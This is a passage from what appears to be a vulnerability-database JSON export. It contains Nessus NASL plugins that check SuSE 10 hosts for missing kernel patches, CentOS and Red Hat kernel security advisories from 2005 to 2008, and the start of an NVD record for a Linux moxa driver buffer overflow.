exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-default-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-smp-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-source-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-syms-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-debug-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-default-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-kdump-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-smp-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-source-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-syms-2.6.16.60-0.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-2.6.16.60-0.30\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:30", "edition": 19, "description": "This kernel security update fixes lots of bugs and some", "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Linux Kernel (x86) (ZYPP Patch Number 5565)", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3272", "CVE-2008-0598", "CVE-2008-3275", "CVE-2008-1673"], "cpe": ["cpe:/o:suse:suse_linux"], "modified": "2009-09-24T00:00:00", "id": "SUSE_KERNEL-5565.NASL", "href": "https://www.tenable.com/plugins/nessus/41534", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41534);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1673\", \"CVE-2008-3272\", \"CVE-2008-3275\");\n\n script_name(english:\"SuSE 10 Security Update : Linux Kernel (x86) (ZYPP Patch Number 5565)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"This kernel security update fixes lots of bugs and some\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-0598.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1673.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3272.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3275.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5565.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 200, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-bigsmp-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-default-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-smp-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-source-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-syms-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-xen-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-xenpae-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-bigsmp-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-debug-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-default-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-kdump-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-smp-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-source-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-syms-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-vmi-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-vmipae-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-xen-2.6.16.60-0.29\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-xenpae-2.6.16.60-0.29\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:27:38", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0508\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\r\noperating system.\r\n\r\nThese updated packages fix the following security issues:\r\n\r\n* A security flaw was found in the Linux kernel memory copy routines, when\r\nrunning on certain AMD64 systems. If an unsuccessful attempt to copy kernel\r\nmemory from source to destination memory locations occurred, the copy\r\nroutines did not zero the content at the destination memory location. This\r\ncould allow a local unprivileged user to view potentially sensitive data.\r\n(CVE-2008-2729, Important)\r\n\r\n* Alexey Dobriyan discovered a race condition in the Linux kernel\r\nprocess-tracing system call, ptrace. A local unprivileged user could\r\nuse this flaw to cause a denial of service (kernel hang).\r\n(CVE-2008-2365, Important)\r\n\r\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\r\n64-bit emulation. This could allow a local unprivileged user to prepare and\r\nrun a specially crafted binary, which would use this deficiency to leak\r\nuninitialized and potentially sensitive data. (CVE-2008-0598, Important)\r\n\r\n* It was discovered that the Linux kernel handled string operations in the\r\nopposite way to the GNU Compiler Collection (GCC). This could allow a local\r\nunprivileged user to cause memory corruption. (CVE-2008-1367, Low)\r\n\r\nAs well, these updated packages fix the following bug:\r\n\r\n* On systems with a large number of CPUs (more than 16), multiple\r\napplications calling the \"times()\" system call may have caused a system\r\nhang.\r\n\r\nRed Hat Enterprise Linux 4 users are advised to upgrade to these updated\r\npackages, which contain backported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027088.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027089.html\n\n**Affected packages:**\nkernel\nkernel-devel\nkernel-doc\nkernel-hugemem\nkernel-hugemem-devel\nkernel-largesmp\nkernel-largesmp-devel\nkernel-smp\nkernel-smp-devel\nkernel-xenU\nkernel-xenU-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0508.html", "edition": 4, "modified": "2008-06-27T10:43:55", "published": "2008-06-27T10:43:30", "href": "http://lists.centos.org/pipermail/centos-announce/2008-June/027088.html", "id": "CESA-2008:0508", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:24:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2358"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0519\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\r\noperating system.\r\n\r\nThese updated packages fix the following security issues:\r\n\r\n* A security flaw was found in the Linux kernel memory copy routines, when\r\nrunning on certain AMD64 systems. If an unsuccessful attempt to copy kernel\r\nmemory from source to destination memory locations occurred, the copy\r\nroutines did not zero the content at the destination memory location. This\r\ncould allow a local unprivileged user to view potentially sensitive data.\r\n(CVE-2008-2729, Important)\r\n\r\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\r\n64-bit emulation. This could allow a local unprivileged user to prepare and\r\nrun a specially crafted binary, which would use this deficiency to leak\r\nuninitialized and potentially sensitive data. (CVE-2008-0598, Important)\r\n\r\n* Brandon Edwards discovered a missing length validation check in the Linux\r\nkernel DCCP module reconciliation feature. This could allow a local\r\nunprivileged user to cause a heap overflow, gaining privileges for\r\narbitrary code execution. (CVE-2008-2358, Moderate)\r\n\r\nAs well, these updated packages fix the following bug:\r\n\r\n* Due to a regression, \"gettimeofday\" may have gone backwards on certain\r\nx86 hardware. This issue was quite dangerous for time-sensitive systems,\r\nsuch as those used for transaction systems and databases, and may have\r\ncaused applications to produce incorrect results, or even crash.\r\n\r\nRed Hat Enterprise Linux 5 users are advised to upgrade to these updated\r\npackages, which contain backported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027074.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027075.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0519.html", "edition": 3, "modified": "2008-06-26T11:40:24", "published": "2008-06-26T11:40:24", "href": "http://lists.centos.org/pipermail/centos-announce/2008-June/027074.html", "id": "CESA-2008:0519", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:13", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0749", "CVE-2005-0504", "CVE-2004-1056", "CVE-2005-1263"], "description": "**CentOS Errata and Security Advisory** CESA-2005:529-01\n\n\nThe Linux kernel handles the basic functions of the operating system.\r\n\r\nThis is a kernel maintenance update to Red Hat Enterprise Linux 2.1.\r\n\r\nThe following security issues were corrected:\r\n\r\nA flaw between execve() syscall handling and core dumping of ELF-format\r\nexecutables allowed local unprivileged users to cause a denial of\r\nservice (system crash) or possibly gain privileges. The Common\r\nVulnerabilities and Exposures project has assigned the name CAN-2005-1263\r\nto this issue. \r\n\r\nA flaw when freeing a pointer in load_elf_library was discovered. A local\r\nuser could potentially use this flaw to cause a denial of service (crash).\r\n(CAN-2005-0749)\r\n\r\nThe Direct Rendering Manager (DRM) driver did not properly check the DMA\r\nlock, which could allow remote attackers or local users to cause a denial\r\nof service (X Server crash) or possibly modify the video output.\r\n(CAN-2004-1056)\r\n\r\nA flaw in the moxa serial driver could allow a local user to perform\r\nprivileged operations such as replacing the firmware. (CAN-2005-0504)\r\n\r\nThe following bug fixes were also made:\r\n\r\n- Fix a race condition that can cause a panic in __get_lease()\r\n- Fix a race condition that can cause a panic when reading /proc/mdstat\r\n- Fix incorrect ide accounting\r\n- Prevent non-root users from reloading moxa driver firmware\r\n- Fix a null-pointer-dereference bug in rpciod\r\n- Fix legacy-usb handoff for certain IBM platforms\r\n- Fix a bug that caused busy inodes after unmount\r\n- Provide an additional fix for a memory leak in scsi_scan_single.\r\n- Fix a potential kswapd/dquot deadlock.\r\n- Fix a potential local DoS in shmemfs.\r\n- Fix a random poolsize vulnerability.\r\n\r\nRed Hat Enterprise Linux 2.1 users are advised to upgrade their kernels to\r\nthe packages associated with their machine configurations as listed in this\r\nerratum.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-August/024135.html\n\n**Affected packages:**\nkernel\nkernel-BOOT\nkernel-debug\nkernel-doc\nkernel-enterprise\nkernel-headers\nkernel-smp\nkernel-source\nkernel-summit\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 5, "modified": "2005-08-26T03:54:07", "published": "2005-08-26T03:54:07", "href": "http://lists.centos.org/pipermail/centos-announce/2005-August/024135.html", "id": "CESA-2005:529-01", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:24:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6282", "CVE-2008-1669", "CVE-2005-0504", "CVE-2008-1375", "CVE-2008-1615", "CVE-2008-0007"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0237\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues:\n\n* the absence of a protection mechanism when attempting to access a\ncritical section of code has been found in the Linux kernel open file\ndescriptors control mechanism, fcntl. This could allow a local unprivileged\nuser to simultaneously execute code, which would otherwise be protected\nagainst parallel execution. As well, a race condition when handling locks\nin the Linux kernel fcntl functionality, may have allowed a process\nbelonging to a local unprivileged user to gain re-ordered access to the\ndescriptor table. (CVE-2008-1669, Important)\n\n* on AMD64 architectures, the possibility of a kernel crash was discovered\nby testing the Linux kernel process-trace ability. This could allow a local\nunprivileged user to cause a denial of service (kernel crash).\n(CVE-2008-1615, Important)\n\n* the absence of a protection mechanism when attempting to access a\ncritical section of code, as well as a race condition, have been found\nin the Linux kernel file system event notifier, dnotify. This could allow a\nlocal unprivileged user to get inconsistent data, or to send arbitrary\nsignals to arbitrary system processes. (CVE-2008-1375, Important)\n\nRed Hat would like to thank Nick Piggin for responsibly disclosing the\nfollowing issue:\n\n* when accessing kernel memory locations, certain Linux kernel drivers\nregistering a fault handler did not perform required range checks. A local\nunprivileged user could use this flaw to gain read or write access to\narbitrary kernel memory, or possibly cause a kernel crash.\n(CVE-2008-0007, Important)\n\n* the possibility of a kernel crash was found in the Linux kernel IPsec\nprotocol implementation, due to improper handling of fragmented ESP\npackets. When an attacker controlling an intermediate router fragmented\nthese packets into very small pieces, it would cause a kernel crash on the\nreceiving node during packet reassembly. (CVE-2007-6282, Important)\n\n* a flaw in the MOXA serial driver could allow a local unprivileged user\nto perform privileged operations, such as replacing firmware.\n(CVE-2005-0504, Important)\n\nAs well, these updated packages fix the following bugs:\n\n* multiple buffer overflows in the neofb driver have been resolved. It was\nnot possible for an unprivileged user to exploit these issues, and as such,\nthey have not been handled as security issues.\n\n* a kernel panic, due to inconsistent detection of AGP aperture size, has\nbeen resolved.\n\n* a race condition in UNIX domain sockets may have caused \"recv()\" to\nreturn zero. In clustered configurations, this may have caused unexpected\nfailovers.\n\n* to prevent link storms, network link carrier events were delayed by up to\none second, causing unnecessary packet loss. Now, link carrier events are\nscheduled immediately.\n\n* a client-side race on blocking locks caused large time delays on NFS file\nsystems.\n\n* in certain situations, the libATA sata_nv driver may have sent commands\nwith duplicate tags, which were rejected by SATA devices. This may have\ncaused infinite reboots.\n\n* running the \"service network restart\" command may have caused networking\nto fail.\n\n* a bug in NFS caused cached information about directories to be stored\nfor too long, causing wrong attributes to be read.\n\n* on systems with a large highmem/lowmem ratio, NFS write performance may\nhave been very slow when using small files.\n\n* a bug, which caused network hangs when the system clock was wrapped\naround zero, has been resolved.\n\nRed Hat Enterprise Linux 4 users are advised to upgrade to these updated\npackages, which contain backported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-May/026926.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-May/026927.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-May/026929.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-May/026933.html\n\n**Affected packages:**\nkernel\nkernel-devel\nkernel-doc\nkernel-hugemem\nkernel-hugemem-devel\nkernel-largesmp\nkernel-largesmp-devel\nkernel-smp\nkernel-smp-devel\nkernel-xenU\nkernel-xenU-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0237.html", "edition": 4, "modified": "2008-05-10T18:21:04", "published": "2008-05-10T02:08:23", "href": "http://lists.centos.org/pipermail/centos-announce/2008-May/026926.html", "id": "CESA-2008:0237", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:03", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0598", "CVE-2008-1367", "CVE-2008-2365", "CVE-2008-2729"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\r\noperating system.\r\n\r\nThese updated packages fix the following security issues:\r\n\r\n* A security flaw was found in the Linux kernel memory copy routines, when\r\nrunning on certain AMD64 systems. If an unsuccessful attempt to copy kernel\r\nmemory from source to destination memory locations occurred, the copy\r\nroutines did not zero the content at the destination memory location. This\r\ncould allow a local unprivileged user to view potentially sensitive data.\r\n(CVE-2008-2729, Important)\r\n\r\n* Alexey Dobriyan discovered a race condition in the Linux kernel\r\nprocess-tracing system call, ptrace. A local unprivileged user could\r\nuse this flaw to cause a denial of service (kernel hang).\r\n(CVE-2008-2365, Important)\r\n\r\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\r\n64-bit emulation. This could allow a local unprivileged user to prepare and\r\nrun a specially crafted binary, which would use this deficiency to leak\r\nuninitialized and potentially sensitive data. (CVE-2008-0598, Important)\r\n\r\n* It was discovered that the Linux kernel handled string operations in the\r\nopposite way to the GNU Compiler Collection (GCC). This could allow a local\r\nunprivileged user to cause memory corruption. (CVE-2008-1367, Low)\r\n\r\nAs well, these updated packages fix the following bug:\r\n\r\n* On systems with a large number of CPUs (more than 16), multiple\r\napplications calling the \"times()\" system call may have caused a system\r\nhang.\r\n\r\nRed Hat Enterprise Linux 4 users are advised to upgrade to these updated\r\npackages, which contain backported patches to resolve these issues.", "modified": "2017-09-08T12:08:36", "published": "2008-06-25T04:00:00", "id": "RHSA-2008:0508", "href": "https://access.redhat.com/errata/RHSA-2008:0508", "type": "redhat", "title": "(RHSA-2008:0508) Important: kernel security and bug fix update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:56", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0598", "CVE-2008-2358", "CVE-2008-2729"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\r\noperating system.\r\n\r\nThese updated packages fix the following security issues:\r\n\r\n* A security flaw was found in the Linux kernel memory copy routines, when\r\nrunning on certain AMD64 systems. If an unsuccessful attempt to copy kernel\r\nmemory from source to destination memory locations occurred, the copy\r\nroutines did not zero the content at the destination memory location. This\r\ncould allow a local unprivileged user to view potentially sensitive data.\r\n(CVE-2008-2729, Important)\r\n\r\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\r\n64-bit emulation. This could allow a local unprivileged user to prepare and\r\nrun a specially crafted binary, which would use this deficiency to leak\r\nuninitialized and potentially sensitive data. (CVE-2008-0598, Important)\r\n\r\n* Brandon Edwards discovered a missing length validation check in the Linux\r\nkernel DCCP module reconciliation feature. This could allow a local\r\nunprivileged user to cause a heap overflow, gaining privileges for\r\narbitrary code execution. (CVE-2008-2358, Moderate)\r\n\r\nAs well, these updated packages fix the following bug:\r\n\r\n* Due to a regression, \"gettimeofday\" may have gone backwards on certain\r\nx86 hardware. This issue was quite dangerous for time-sensitive systems,\r\nsuch as those used for transaction systems and databases, and may have\r\ncaused applications to produce incorrect results, or even crash.\r\n\r\nRed Hat Enterprise Linux 5 users are advised to upgrade to these updated\r\npackages, which contain backported patches to resolve these issues.", "modified": "2017-09-08T12:09:46", "published": "2008-06-25T04:00:00", "id": "RHSA-2008:0519", "href": "https://access.redhat.com/errata/RHSA-2008:0519", "type": "redhat", "title": "(RHSA-2008:0519) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1056", "CVE-2005-0504", "CVE-2005-0749", "CVE-2005-1263"], "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nThis is a kernel maintenance update to Red Hat Enterprise Linux 2.1.\r\n\r\nThe following security issues were corrected:\r\n\r\nA flaw between execve() syscall handling and core dumping of ELF-format\r\nexecutables allowed local unprivileged users to cause a denial of\r\nservice (system crash) or possibly gain privileges. The Common\r\nVulnerabilities and Exposures project has assigned the name CAN-2005-1263\r\nto this issue. \r\n\r\nA flaw when freeing a pointer in load_elf_library was discovered. A local\r\nuser could potentially use this flaw to cause a denial of service (crash).\r\n(CAN-2005-0749)\r\n\r\nThe Direct Rendering Manager (DRM) driver did not properly check the DMA\r\nlock, which could allow remote attackers or local users to cause a denial\r\nof service (X Server crash) or possibly modify the video output.\r\n(CAN-2004-1056)\r\n\r\nA flaw in the moxa serial driver could allow a local user to perform\r\nprivileged operations such as replacing the firmware. (CAN-2005-0504)\r\n\r\nThe following bug fixes were also made:\r\n\r\n- Fix a race condition that can cause a panic in __get_lease()\r\n- Fix a race condition that can cause a panic when reading /proc/mdstat\r\n- Fix incorrect ide accounting\r\n- Prevent non-root users from reloading moxa driver firmware\r\n- Fix a null-pointer-dereference bug in rpciod\r\n- Fix legacy-usb handoff for certain IBM platforms\r\n- Fix a bug that caused busy inodes after unmount\r\n- Provide an additional fix for a memory leak in scsi_scan_single.\r\n- Fix a potential kswapd/dquot deadlock.\r\n- Fix a potential local DoS in shmemfs.\r\n- Fix a random poolsize vulnerability.\r\n\r\nRed Hat Enterprise Linux 2.1 users are advised to upgrade their kernels to\r\nthe packages associated with their machine configurations as listed in this\r\nerratum.", "modified": "2018-03-14T19:27:25", "published": "2005-08-25T04:00:00", "id": "RHSA-2005:529", "href": "https://access.redhat.com/errata/RHSA-2005:529", "type": "redhat", "title": "(RHSA-2005:529) kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:36", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1056", "CVE-2005-0504", "CVE-2005-0749", "CVE-2005-1263", "CVE-2005-1761", "CVE-2005-1768"], "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nThis is a kernel maintenance update to Red Hat Enterprise Linux 2.1.\r\n\r\nThe following security issues are corrected:\r\n\r\nA flaw between execve() syscall handling and core dumping of ELF-format\r\nexecutables allowed local unprivileged users to cause a denial of\r\nservice (system crash) or possibly gain privileges. The Common\r\nVulnerabilities and Exposures project has assigned the name CAN-2005-1263\r\nto this issue.\r\n\r\nA flaw in ptrace for Itanium architectures was discovered. A local user\r\ncould use this flaw to cause a denial of service (crash) or possibly gain\r\nprivileges. (CAN-2005-1761)\r\n\r\nA race condition in the ia32 compatibility code for the execve system call\r\nwas discovered. A local user could use this flaw to cause a denial of\r\nservice (kernel panic) or possibly gain privileges. (CAN-2005-1768)\r\n\r\nA flaw when freeing a pointer in load_elf_library was discovered. A local\r\nuser could potentially use this flaw to cause a denial of service (crash).\r\n(CAN-2005-0749)\r\n\r\nThe Direct Rendering Manager (DRM) driver did not properly check the DMA\r\nlock, which could allow remote attackers or local users to cause a denial\r\nof service (X Server crash) or possibly modify the video output.\r\n(CAN-2004-1056)\r\n\r\nA flaw in the moxa serial driver could allow a local user to perform\r\nprivileged operations such as replacing the firmware. (CAN-2005-0504) \r\n\r\nThe following bug fixes were also made:\r\n\r\n- \"busy inodes after unmount\" error on NFS volumes\r\n- Establish 64-bit limits even for 32-bit threads\r\n- Fix a race condition in __get_lease\r\n- Fix error in IDE disk accounting. This last fix causes IO accounting \r\n to occur only on READ and WRITE operations. This fixes several bugs \r\n in various accounting and statistic utilities.\r\n- Fix kswapd/dquot deadlock bug\r\n- Fix loop control bug in do_shmem_file_read\r\n\r\nAll Red Hat Enterprise Linux 2.1 Itanium users are advised to upgrade their\r\nkernels to the packages associated with their machine configurations as\r\nlisted in this erratum.", "modified": "2018-03-14T19:26:41", "published": "2005-08-25T04:00:00", "id": "RHSA-2005:551", "href": "https://access.redhat.com/errata/RHSA-2005:551", "type": "redhat", "title": "(RHSA-2005:551) kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T19:22:18", "description": "Buffer overflow in the MoxaDriverIoctl function for the moxa serial driver (moxa.c) in Linux 2.2.x, 2.4.x, and 2.6.x before 2.6.22 allows local users to execute arbitrary code via a certain modified length value.", "edition": 5, "cvss3": {}, "published": "2005-03-14T05:00:00", "title": "CVE-2005-0504", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0504"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:2.2.20", "cpe:/o:linux:linux_kernel:2.5.36", "cpe:/o:linux:linux_kernel:2.2.7", "cpe:/o:linux:linux_kernel:2.4.27", "cpe:/o:linux:linux_kernel:2.2.24", "cpe:/o:linux:linux_kernel:2.4.9", "cpe:/o:linux:linux_kernel:2.6.21", "cpe:/o:linux:linux_kernel:2.5.26", "cpe:/o:linux:linux_kernel:2.5.41", "cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.5.10", "cpe:/o:linux:linux_kernel:2.4.21", "cpe:/o:linux:linux_kernel:2.5.64", "cpe:/o:linux:linux_kernel:2.2.15", "cpe:/o:linux:linux_kernel:2.5.32", "cpe:/o:linux:linux_kernel:2.4.24_ow1", "cpe:/o:linux:linux_kernel:2.2.5", 